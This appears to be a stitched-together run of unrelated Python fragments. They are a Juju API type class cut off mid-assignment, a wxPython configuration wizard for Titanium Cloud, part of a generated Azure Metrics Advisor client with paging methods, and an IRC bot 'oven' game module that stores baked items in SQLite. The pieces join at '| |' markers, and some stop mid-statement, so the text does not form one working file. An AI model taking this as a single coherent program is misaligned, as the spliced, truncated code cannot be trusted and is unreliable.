provider_attributes : typing.Mapping[str, typing.Any]
provider_id : str
subnets : typing.Sequence[~Subnet]
'''
cloud_type_ = cloud_type
name_ = name
provider_attributes_ = provider_attributes
provider_id_ = provider_id
subnets_ = [Subnet.from_json(o) for o in subnets or []]
# Validate arguments against known Juju API types.
if cloud_type_ is not None and not isinstance(cloud_type_, (bytes, str)):
raise Exception("Expected cloud_type_ to be a str, received: {}".format(type(cloud_type_)))
if name_ is not None and not isinstance(name_, (bytes, str)):
raise Exception("Expected name_ to be a str, received: {}".format(type(name_)))
if provider_attributes_ is not None and not isinstance(provider_attributes_, dict):
raise Exception("Expected provider_attributes_ to be a Mapping, received: {}".format(type(provider_attributes_)))
if provider_id_ is not None and not isinstance(provider_id_, (bytes, str)):
raise Exception("Expected provider_id_ to be a str, received: {}".format(type(provider_id_)))
if subnets_ is not None and not isinstance(subnets_, (bytes, str, list)):
raise Exception("Expected subnets_ to be a Sequence, received: {}".format(type(subnets_)))
self.cloud_type = cloud_type_
self.name = name_
self.provider_attributes = provider_attributes_
self.provider_id = provider_id_
self.subnets = | |
"""
Copyright (c) 2015-2017 Wind River Systems, Inc.
SPDX-License-Identifier: Apache-2.0
"""
from collections import OrderedDict
from six.moves import configparser
import wx
import wx.wizard as wiz
import wx.lib.dialogs
import wx.lib.scrolledpanel
from configutilities.common.configobjects import REGION_CONFIG
from configutilities.common.configobjects import DEFAULT_CONFIG
from configutilities.common.exceptions import ValidateFail
from configutilities.common.guicomponents import Field
from configutilities.common.guicomponents import TYPES
from configutilities.common.guicomponents import prepare_fields
from configutilities.common.guicomponents import on_change
from configutilities.common.guicomponents import debug
from configutilities.common.guicomponents import set_icons
from configutilities.common.guicomponents import TEXT_WIDTH
from configutilities.common.guicomponents import VGAP
from configutilities.common.guicomponents import HGAP
from configutilities.common.validator import ConfigValidator
from configutilities.common.validator import TiS_VERSION
PADDING = 5
CONFIG_TYPE = DEFAULT_CONFIG
# Config parser to hold current configuration
filename = None
filedir = None
config = configparser.RawConfigParser()
config.optionxform = str
def print_config(conf=config):
debug('======CONFIG CONTENTS======')
debug(get_config(config))
debug('======END CONFIG======')
def get_config(conf=config):
result = ""
for section in conf.sections():
result += "\n[" + section + "]" + "\n"
for option in config.options(section):
result += option + "=" + config.get(section, option) + "\n"
return result
def get_opt(section, option):
if config.has_section(section):
if config.has_option(section, option):
return config.get(section, option)
return None
class ConfigWizard(wx.wizard.Wizard):
"""Titanium Cloud configuration wizard, contains pages and more specifically
ConfigPages, which have a structure for populating/processing
configuration fields (questions)
"""
def __init__(self):
wx.wizard.Wizard.__init__(self, None, -1,
"Titanium Cloud Configuration File "
"Creator v" + TiS_VERSION)
set_icons(self)
self.pages = []
# Catch wizard events
self.Bind(wiz.EVT_WIZARD_PAGE_CHANGED, self.on_page_changed)
self.Bind(wiz.EVT_WIZARD_PAGE_CHANGING, self.on_page_changing)
self.Bind(wiz.EVT_WIZARD_CANCEL, self.on_cancel)
self.Bind(wiz.EVT_WIZARD_FINISHED, self.on_finished)
self.add_page(STARTPage(self))
self.add_page(REGIONPage(self))
self.add_page(SHAREDSERVICESPage(self))
self.add_page(REG2SERVICESPage(self))
self.add_page(REG2SERVICESPage2(self))
self.add_page(SYSTEMPage(self))
self.add_page(PXEBootPage(self))
self.add_page(MGMTPage(self))
self.add_page(INFRAPage(self))
self.add_page(OAMPage(self))
self.add_page(AUTHPage(self))
self.add_page(ENDPage(self))
size = self.GetBestSize()
# Deprecated, from before scroll panel
# for page in self.pages:
# if issubclass(type(page), ConfigPage):
# # Must create fields for the page and show them all
# # to get max possible size
# page.load()
# page.GetSizer().ShowItems(True)
# page_size = page.GetBestSize()
# if page_size.GetHeight() > size.GetHeight():
# size.SetHeight(page_size.GetHeight())
# if page_size.GetWidth() > size.GetWidth():
# size.SetWidth(page_size.GetWidth())
# page.DestroyChildren()
size.SetWidth(560)
size.SetHeight(530)
self.SetPageSize(size)
self.GetSizer().Layout()
def add_page(self, page):
"""Add a new page"""
if self.pages:
previous_page = self.pages[-1]
page.SetPrev(previous_page)
previous_page.SetNext(page)
self.pages.append(page)
def run(self):
"""Start the wizard"""
self.RunWizard(self.pages[0])
def on_page_changed(self, evt):
"""Executed after the page has changed."""
page = evt.GetPage()
if evt.GetDirection():
page.DestroyChildren()
page.load()
def on_page_changing(self, evt):
"""Executed before the page changes, can be blocked (vetoed)"""
page = evt.GetPage()
# Perform the page validation
if evt.GetDirection():
try:
page.validate_page()
except Exception as ex:
dlg = wx.MessageDialog( # ScrolledMessageDialog(
self,
ex.message,
"Error on page")
dlg.ShowModal()
# Do not allow progress if errors were raised
evt.Veto()
# raise ex
def on_cancel(self, evt):
"""On cancel button press, not used for now"""
pass
def on_finished(self, evt):
"""On finish button press, not used for now"""
pass
def skip_page(self, page, skip):
for p in self.pages:
if p.__class__.__name__ == page.__name__:
p.skip = skip
class WizardPage(wiz.PyWizardPage):
""" An extended panel obj with a few methods to keep track of its siblings.
This should be modified and added to the wizard. Season to taste."""
def __init__(self, parent):
wx.wizard.PyWizardPage.__init__(self, parent)
self.parent = parent
self.title = ""
self.next = self.prev = None
self.sizer = wx.BoxSizer(wx.VERTICAL)
self.SetSizer(self.sizer)
self.skip = False
def set_title(self, title_text):
title = wx.StaticText(self, -1, title_text)
title.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.BOLD))
self.sizer.AddWindow(title, 0, wx.ALIGN_LEFT | wx.ALL, PADDING)
self.add_line()
def add_content(self, content, proportion=0):
"""Add aditional widgets to the bottom of the page"""
self.sizer.Add(content, proportion, wx.EXPAND | wx.ALL, PADDING)
def add_line(self):
self.sizer.AddWindow(wx.StaticLine(self, -1), 0, wx.EXPAND | wx.ALL,
PADDING)
def SetNext(self, next):
"""Set the next page"""
self.next = next
def SetPrev(self, prev):
"""Set the previous page"""
self.prev = prev
def GetNext(self):
"""Return the next page"""
if self.next and self.next.skip:
return self.next.GetNext()
return self.next
def GetPrev(self):
"""Return the previous page"""
if self.prev and self.prev.skip:
return self.prev.GetPrev()
return self.prev
def load(self):
# Run every time a page is visited (from prev or next page)
pass
def validate_page(self):
# Validate the config related to this specific page before advancing
pass
class ConfigPage(WizardPage):
""" A Page of the wizard with questions/answers
"""
def __init__(self, *args, **kwargs):
super(ConfigPage, self).__init__(*args, **kwargs)
# Section header to put in the INI file
self.section = ""
# Methods of the config_validator to be called for this section
self.validator_methods = []
self.title = ""
self.help_text = ""
self.fields = OrderedDict()
def load(self):
self.title = ""
self.sizer = wx.BoxSizer(wx.VERTICAL)
self.SetSizer(self.sizer)
self.section = ""
self.title = ""
self.help_text = ""
for field in self.fields.values():
field.destroy()
self.fields = OrderedDict()
def do_setup(self):
# Reset page, in case fields have changed
self.sizer = wx.BoxSizer(wx.VERTICAL)
self.SetSizer(self.sizer)
# Set up title and help text
self.set_title(self.title)
if self.help_text:
help_text = wx.StaticText(self, -1, self.help_text)
help_text.Wrap(TEXT_WIDTH)
self.add_content(help_text)
self.add_line()
self.spanel = wx.lib.scrolledpanel.ScrolledPanel(self, -1)
# to view spanel: , style=wx.SIMPLE_BORDER)
self.add_content(self.spanel, 3)
# Add fields to page
# gridSizer = wx.FlexGridSizer(rows=6, cols=2, vgap=10,
# hgap=10)
self.gridSizer = wx.GridBagSizer(vgap=VGAP, hgap=HGAP)
# gridSizer.SetFlexibleDirection(wx.VERTICAL)
# gridSizer.SetFlexibleDirection(wx.BOTH)
self.spanel.SetSizer(self.gridSizer)
self.spanel.SetupScrolling()
# self.add_content(gridSizer)
prepare_fields(self.spanel, self.fields, self.gridSizer,
self.on_change)
self.Layout()
self.spanel.Layout()
def on_change(self, event):
on_change(self, self.fields, event)
def validate_page(self):
# Gets the config from the current page, then sends to the validator
self.get_config()
print_config(config)
validator = ConfigValidator(config, None, CONFIG_TYPE, True)
mode = get_opt('SYSTEM', 'SYSTEM_MODE')
if mode:
validator.set_system_mode(mode)
dc_role = get_opt('SYSTEM', 'DISTRIBUTED_CLOUD_ROLE')
if dc_role:
validator.set_system_dc_role(dc_role)
for method in self.validator_methods:
getattr(validator, method)()
def get_config(self):
# Removes possibly out-dated config section so it can be over-written
if config.has_section(self.section):
config.remove_section(self.section)
self.add_fields()
def add_fields(self):
# Adds the page's section to the config object if necessary
if not config.has_section(self.section):
config.add_section(self.section)
# Add all of the non-transient fields (straight-forward mapping)
for name, field in self.fields.items():
if not field.transient and field.get_value():
config.set(self.section, name, field.get_value())
def bind_events(self):
pass
class STARTPage(WizardPage):
def load(self):
super(STARTPage, self).load()
self.set_title("Start")
help_text = wx.StaticText(
self, -1,
"Welcome to the Titanium Cloud Configuration File "
"Creator.\n\n"
"This wizard will walk you through the steps of creating a "
"configuration file which can be used to automate the "
"installation of Titanium Cloud. Note this utility can only be "
"used to create configuration files compatible with version " +
TiS_VERSION + " of Titanium Cloud.\n\n"
"NOTE: Moving backwards in the wizard will result in loss of the "
"current page's configuration and will need to be reentered\n\n"
"Press next to begin.\n\n\n\n")
help_text.Wrap(TEXT_WIDTH)
self.add_content(help_text)
# self.add_line()
# To implement this, would need special mapping for every page...
# (from config to control)
# putting this on the long(er)-term todo list for now
# self.add_content(wx.StaticText(
# self, -1,
# 'You may optionally pre-populate this utility by reading in an '
# 'existing Titanium Cloud configuration file'))
# self.load_button = wx.Button(self, -1, "Load Configuration File "
# "(Optional)")
# self.Bind(wx.EVT_BUTTON, self.on_read, self.load_button)
# self.add_content(self.load_button)
def on_read(self, event):
reader = wx.FileDialog(
self, "Open Existing Titanium Cloud Configuration File",
"", "", "INI file (*.ini)|*.ini",
wx.FD_OPEN | wx.FD_FILE_MUST_EXIST)
if reader.ShowModal() == wx.ID_CANCEL:
return
# Read in the config file
global filename, filedir, config
try:
config.read(reader.GetPath())
filename = reader.GetFilename()
filedir = reader.GetDirectory()
except Exception as ex:
wx.LogError("Cannot parse configuration file, Error: %s." % ex)
config = configparser.RawConfigParser()
config.optionxform = str
return
# todo tsmith
# Do validation of the imported file
class REGIONPage(ConfigPage):
def load(self):
super(REGIONPage, self).load()
# Header in INI file
self.section = "SHARED_SERVICES"
self.validator_methods = []
self.title = "Region Configuration"
self.help_text = (
"Configuring this system in region mode provides the ability to "
"operate as a secondary independent region to an existing "
"Openstack cloud deployment (Certain restrictions apply, refer to "
"system documentation).\n\n"
"Keystone (and optionally Glance) "
"services can be configured as shared services, which "
"prevents them from being configured on the secondary region and "
"instead those services already configured in the primary region "
"will be accessed.")
self.set_fields()
self.do_setup()
self.bind_events()
# Skip region pages by default
self.skip_region(True)
def set_fields(self):
self.fields['is_region'] = Field(
text="Configure as a secondary region",
type=TYPES.checkbox,
transient=True,
shows=["REGION_NAME",
"ADMIN_TENANT_NAME",
"ADMIN_USER_NAME",
"ADMIN_PASSWORD",
"SERVICE_TENANT_NAME",
"keystone_help",
"KEYSTONE_ADMINURL",
"sep1",
"keystone_note",
]
)
self.fields['REGION_NAME'] = Field(
text="Name of the primary region",
type=TYPES.string,
initial="RegionOne"
)
self.fields["sep1"] = Field(type=TYPES.separator)
self.fields['keystone_help'] = Field(
text="Primary Keystone Configuration\n\nThis information "
"is needed for the primary "
"region in order to validate or create the shared "
"services.",
type=TYPES.help,
)
self.fields['SERVICE_TENANT_NAME'] = Field(
text="Name of the service tenant",
type=TYPES.string,
initial="RegionTwo_services"
)
self.fields['ADMIN_TENANT_NAME'] = Field(
text="Name of the admin tenant",
type=TYPES.string,
initial="admin"
)
self.fields['ADMIN_USER_NAME'] = Field(
text="Username of the keystone admin account",
type=TYPES.string,
initial="admin"
)
self.fields['ADMIN_PASSWORD'] = Field(
text="Password of the keystone admin account",
type=TYPES.string,
initial=""
)
self.fields['KEYSTONE_ADMINURL'] = Field(
text="Authentication URL | |
skip: Optional[int] = None,
maxpagesize: Optional[int] = None,
**kwargs: Any
) -> Iterable[str]:
"""Query dimension values of anomalies.
Query dimension values of anomalies.
:param configuration_id: anomaly detection configuration unique id. Required.
:type configuration_id: str
:param body: query dimension values request. Required.
:type body: any
:keyword skip: for paging, skipped number. Default value is None.
:paramtype skip: int
:keyword maxpagesize: the maximum number of items in one page. Default value is None.
:paramtype maxpagesize: int
:return: An iterator like instance of str
:rtype: ~azure.core.paging.ItemPaged[str]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = kwargs.pop("params", {}) or {}
content_type = kwargs.pop("content_type", _headers.pop("Content-Type", "application/json")) # type: str
cls = kwargs.pop("cls", None) # type: ClsType[AnomalyDimensionList]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
_json = self._serialize.body(body, "object")
request = build_list_anomaly_dimension_values_request(
configuration_id=configuration_id,
skip=skip,
maxpagesize=maxpagesize,
content_type=content_type,
json=_json,
headers=_headers,
params=_params,
)
path_format_arguments = {
"endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
else:
_json = self._serialize.body(body, "object")
request = build_list_anomaly_dimension_values_request(
configuration_id=configuration_id,
content_type=content_type,
json=_json,
headers=_headers,
params=_params,
)
path_format_arguments = {
"endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(next_link, **path_format_arguments) # type: ignore
path_format_arguments = {
"endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("AnomalyDimensionList", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize("object", pipeline_response)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return ItemPaged(get_next, extract_data)
@distributed_trace
def get_incidents_by_anomaly_detection_configuration(
self, configuration_id: str, body: Any, *, maxpagesize: Optional[int] = None, **kwargs: Any
) -> Iterable["_models.AnomalyIncident"]:
"""Query incidents under anomaly detection configuration.
Query incidents under anomaly detection configuration.
:param configuration_id: anomaly detection configuration unique id. Required.
:type configuration_id: str
:param body: query detection incident result request. Required.
:type body: any
:keyword maxpagesize: the maximum number of items in one page. Default value is None.
:paramtype maxpagesize: int
:return: An iterator like instance of AnomalyIncident
:rtype: ~azure.core.paging.ItemPaged[~azure.ai.metricsadvisor.models.AnomalyIncident]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = kwargs.pop("params", {}) or {}
content_type = kwargs.pop("content_type", _headers.pop("Content-Type", "application/json")) # type: str
cls = kwargs.pop("cls", None) # type: ClsType[IncidentResultList]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
_json = self._serialize.body(body, "object")
request = build_get_incidents_by_anomaly_detection_configuration_request(
configuration_id=configuration_id,
maxpagesize=maxpagesize,
content_type=content_type,
json=_json,
headers=_headers,
params=_params,
)
path_format_arguments = {
"endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
else:
_json = self._serialize.body(body, "object")
request = build_get_incidents_by_anomaly_detection_configuration_request(
configuration_id=configuration_id,
content_type=content_type,
json=_json,
headers=_headers,
params=_params,
)
path_format_arguments = {
"endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(next_link, **path_format_arguments) # type: ignore
path_format_arguments = {
"endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("IncidentResultList", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize("object", pipeline_response)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return ItemPaged(get_next, extract_data)
@distributed_trace
def get_incidents_by_anomaly_detection_configuration_next_pages(
self, configuration_id: str, *, maxpagesize: Optional[int] = None, token: Optional[str] = None, **kwargs: Any
) -> Iterable["_models.AnomalyIncident"]:
"""Query incidents under anomaly detection configuration.
Query incidents under anomaly detection configuration.
:param configuration_id: anomaly detection configuration unique id. Required.
:type configuration_id: str
:keyword maxpagesize: the maximum number of items in one page. Default value is None.
:paramtype maxpagesize: int
:keyword token: the token for getting the next page. Default value is None.
:paramtype token: str
:return: An iterator like instance of AnomalyIncident
:rtype: ~azure.core.paging.ItemPaged[~azure.ai.metricsadvisor.models.AnomalyIncident]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = kwargs.pop("params", {}) or {}
cls = kwargs.pop("cls", None) # type: ClsType[IncidentResultList]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_get_incidents_by_anomaly_detection_configuration_next_pages_request(
configuration_id=configuration_id,
maxpagesize=maxpagesize,
token=token,
headers=_headers,
params=_params,
)
path_format_arguments = {
"endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
else:
request = build_get_incidents_by_anomaly_detection_configuration_next_pages_request(
configuration_id=configuration_id,
headers=_headers,
params=_params,
)
path_format_arguments = {
"endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(next_link, **path_format_arguments) # type: ignore
path_format_arguments = {
"endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("IncidentResultList", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize("object", pipeline_response)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return ItemPaged(get_next, extract_data)
@distributed_trace
def list_incident_root_causes(
self, detection_configuration_id: str, incident_id: str, **kwargs: Any
) -> Iterable["_models.IncidentRootCause"]:
"""Query root cause for incident.
Query root cause for incident.
:param detection_configuration_id: anomaly detection configuration unique id. Required.
:type detection_configuration_id: str
:param incident_id: incident id. Required.
:type incident_id: str
:return: An iterator like instance of IncidentRootCause
:rtype: ~azure.core.paging.ItemPaged[~azure.ai.metricsadvisor.models.IncidentRootCause]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = kwargs.pop("params", {}) or {}
cls = kwargs.pop("cls", None) # type: ClsType[RootCauseList]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_incident_root_causes_request(
detection_configuration_id=detection_configuration_id,
incident_id=incident_id,
headers=_headers,
params=_params,
)
path_format_arguments = {
"endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(request.url, **path_format_arguments) # type: ignore
else:
request = build_list_incident_root_causes_request(
detection_configuration_id=detection_configuration_id,
incident_id=incident_id,
headers=_headers,
params=_params,
)
path_format_arguments = {
"endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.url = self._client.format_url(next_link, **path_format_arguments) # type: ignore
path_format_arguments = {
"endpoint": self._serialize.url(
"self._config.endpoint", self._config.endpoint, "str", skip_quote=True
),
}
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("RootCauseList", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize("object", pipeline_response)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return ItemPaged(get_next, extract_data)
@overload
def create_datasource_credential( # pylint: disable=inconsistent-return-statements
self, body: _models.DatasourceCredential, *, content_type: str = "application/json", **kwargs: Any
) -> None:
"""Create a new data source credential.
Create a new data source credential.
:param body: Create data source credential request. Required.
:type body: ~azure.ai.metricsadvisor.models.DatasourceCredential
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:return: None
:rtype: None
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
def create_datasource_credential( # pylint: disable=inconsistent-return-statements
self, body: IO, *, content_type: str = "application/json", **kwargs: Any
) -> None:
"""Create a new data source credential.
Create a new data source credential.
:param body: Create data source credential request. Required.
:type body: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:return: None
:rtype: None
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace
def create_datasource_credential( # pylint: disable=inconsistent-return-statements
self, body: Union[_models.DatasourceCredential, IO], **kwargs: Any
) -> None:
"""Create a new data source credential.
Create a new data source credential.
:param body: Create data source credential request. Is either a model type or a IO type.
Required.
:type body: ~azure.ai.metricsadvisor.models.DatasourceCredential or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:return: None
:rtype: None
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = kwargs.pop("params", {}) or {}
content_type = kwargs.pop("content_type", _headers.pop("Content-Type", None)) # type: Optional[str]
cls = kwargs.pop("cls", None) # type: ClsType[None]
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(body, (IO, bytes)):
_content = body
else:
_json = self._serialize.body(body, "DatasourceCredential")
request = build_create_datasource_credential_request(
content_type=content_type,
json=_json,
content=_content,
| |
<gh_stars>1-10
#
# this module was originally written by xfnw.
# (c) xfnw/lickthecheese <<EMAIL>>
#
import time, dataset, out, random
from common import nohighlight
modname = "oven"
DEFAULT_PRICE = 7
ovendb = dataset.connect("sqlite:///dat/oven.db")
oveninv = ovendb["inv"]
ovenqed = ovendb["qed"]
# TODO: add the rest of msgs here
msgs = {
"INV_EMPTY": "you look into the oven and see nothing",
"BAKE_RESULT": "you bake your items, and out pops a {}!",
"BAKE_SMOKING": "the oven begins to smoke...",
"BAKE_EXPLODE": "the oven explodes!",
"BAKE_MURDER": "{} brutally murders the ducc amidst its terrified quaccs and stuffs it into the oven.",
"BAKE_NEED_TWO": "you need at least two items",
"DONT_HAVE_ENOUGH": "you don't have enough of {}",
"DONT_HAVE_ANY": "you don't have any {}",
"USER_NOT_FOUND": "that user doesn't exist",
"FOOD_NOM_NOM": "nom nom nom",
"DUCK_GONE_GONE": "you lose your hold on the ducc and it flies away!",
}
baked_goods = {
nohighlight("khuxkm"): 50,
nohighlight("jan6"): 50,
nohighlight("login"): 50,
"spam": 2,
"flour": 6,
"pizza": 10,
"pancake": 28,
"water": 20,
"ration": 38,
"egg": 30,
"rice": 40,
"bread": 40,
"pie": 58,
"bird": 50,
"tortilla": 65,
"cookie": 74,
"cheese": 80,
"sandwich": 95,
"wafer": 100,
"ducc": 400,
}
baked_price = dict((v, k) for k, v in baked_goods.items())
class NotEnoughItems(Exception):
"""
There isn't enough of an item in
someone's inventory.
"""
pass
class TriedBakeDucc(Exception):
"""
Someone tried to bake a ducc!
"""
pass
class InventoryNotFound(Exception):
"""
Someone tried to transfer an item,
but the inventory doesn't exist.
"""
pass
class SmokingOven(Exception):
"""
Something's wrong...
"""
pass
def _get_price(item):
if item in baked_goods:
return baked_goods[item]
else:
return DEFAULT_PRICE
def _format_items(items):
"""
Take an array of items and format it.
"""
itemstats = {}
for i in items:
if not i in itemstats:
itemstats[i] = 0
itemstats[i] += 1
fmtd = []
for i in sorted(itemstats.items(), key=lambda i: _get_price(i[0])):
fmtd.append(f"{i[0]} (×{i[1]})")
return ", ".join(fmtd)
def _destroy_item(nick, item, count):
"""
Destroy an item in a user's inventory.
"""
found = list(oveninv.find(name=nick, item=item))
if len(found) < count:
raise NotEnoughItems(f"need {count} of {item}, found {len(found)}")
oveninv.delete(id=[i["id"] for i in found[:count]])
def _create_item(nick, item, count):
"""
Create an item and give it to a user.
"""
for i in range(0, count):
oveninv.insert(dict(name=nick, item=item))
def _transfer_item(giver, recipient, item, count):
"""
Take item from <giver>'s inventory and place
it into <recipient>'s inventory.
"""
if ovenqed.find_one(name=recipient) == None:
raise InventoryNotFound()
found = list(oveninv.find(name=giver, item=item))
if len(found) < count:
raise NotEnoughItems(f"need {count} of {item}, found {len(found)}")
for i in range(0, count):
item = found[i]
oveninv.delete(id=item["id"])
oveninv.insert(dict(name=recipient, item=item["item"]))
def _count_item(nick, item):
"""
Check how many of <item> there exist in
<nick>'s inventory.
"""
found = oveninv.find(name=nick, item=item)
return len(list(found))
def _get_baking_results(items):
total = 0
# if item has value, use that, else use a okay value
values = []
for thing in items:
for i in range(0, items[thing]):
values.append(_get_price(thing))
total += 1
# oooo randomize what will pop out
sum_value = sum(values)
avg_value = sum_value / len(values)
output_value = random.uniform(sum_value, sum_value + avg_value)
max_price = max(baked_price.keys())
min_price = min(baked_price.keys())
newitems = []
# choose the output
# keep getting items until we've given enough
remaining = output_value
while remaining > min_price:
while output_value not in list(baked_price.keys()):
output_value = int(output_value - 1)
if output_value < min_price:
while output_value not in list(baked_price.keys()):
output_value = int(output_value + 1)
break
elif output_value > max_price:
while output_value not in list(baked_price.keys()):
output_value = int(output_value - 1)
break
newitems.append(baked_price[output_value])
remaining = round(remaining - output_value)
output_value = remaining
if len(newitems) == total:
break
return newitems
def _bake_items(nick, items):
for thing in items:
found = _count_item(nick, thing)
if found < items[thing]:
raise NotEnoughItems(f"need {items[thing]} of {thing}, found {found}")
if thing == "ducc":
raise TriedBakeDucc()
newitems = _get_baking_results(items)
# consume the item
for item in items:
_destroy_item(nick, item, items[item])
# create the items
for newitem in newitems:
_create_item(nick, newitem, 1)
return newitems
async def purge(self, c, n, m):
if len(m) < 1:
await out.msg(self, modname, c, [f"need username"])
return
oveninv.delete(name=m)
await out.msg(self, modname, c, [f"done"])
async def cheat(self, c, n, m):
if len(m.split(" ")) < 2:
await out.msg(self, modname, c, [f"need username and item."])
return
data = m.split(" ")
user = data[0]
for thing in data[1:]:
_create_item(user, thing, 1)
await out.msg(self, modname, c, [f"done"])
async def give(self, c, n, m):
m = m.split(" ")
if len(m) < 2:
await out.msg(self, modname, c, [f"you can't give air!"])
return
if _count_item(n, m[1]) < 1:
await out.msg(self, modname, c, [msgs["DONT_HAVE_ANY"].format(m[1])])
return
try:
_transfer_item(n, m[0], m[1], 1)
except InventoryNotFound:
await out.msg(self, modname, c, [msgs["USER_NOT_FOUND"]])
return
receiver = nohighlight(m[0])
await out.msg(self, modname, c, [f"you gave {receiver} a {m[1]}!"])
async def giveall(self, c, n, m):
m = m.split(" ")
if len(m) < 2:
await out.msg(self, modname, c, [f"you can't give air!"])
return
itemcount = _count_item(n, m[1])
if itemcount < 1:
await out.msg(self, modname, c, [msgs["DONT_HAVE_ANY"].format(m[1])])
return
try:
_transfer_item(n, m[0], m[1], itemcount)
except InventoryNotFound:
await out.msg(self, modname, c, [msgs["USER_NOT_FOUND"]])
return
receiver = nohighlight(m[0])
# TODO: pluralize properly
await out.msg(self, modname, c, [f"you gave {receiver} your {m[1]}(s)!"])
async def info(self, c, n, m):
query = m.split(" ")[0]
if len(m) < 1:
await out.msg(self, modname, c, [f"need item name"])
return
items = [i["item"] for i in oveninv.find(item=query)]
instances = len(items)
price = _get_price(query) / 10
total_price = instances * price
await out.msg(
self,
modname,
c,
[
f"there exist {instances} {query}s, each with a value of ${price:.2f} and a combined value of ${total_price:.2f}"
],
)
async def owners(self, c, n, m):
query = m.split(" ")[0]
if len(m) < 1:
await out.msg(self, modname, c, [f"need item name."])
return
total = 0
stats = {}
for item in list(oveninv.find(item=query)):
if not item["name"] in stats:
stats[item["name"]] = 0
stats[item["name"]] += 1
total += 1
output = ""
ctr = 0
until = 7
for i in sorted(stats.items(), key=lambda i: i[1], reverse=True):
if ctr == until:
break
percentage = (i[1] * 100) / total
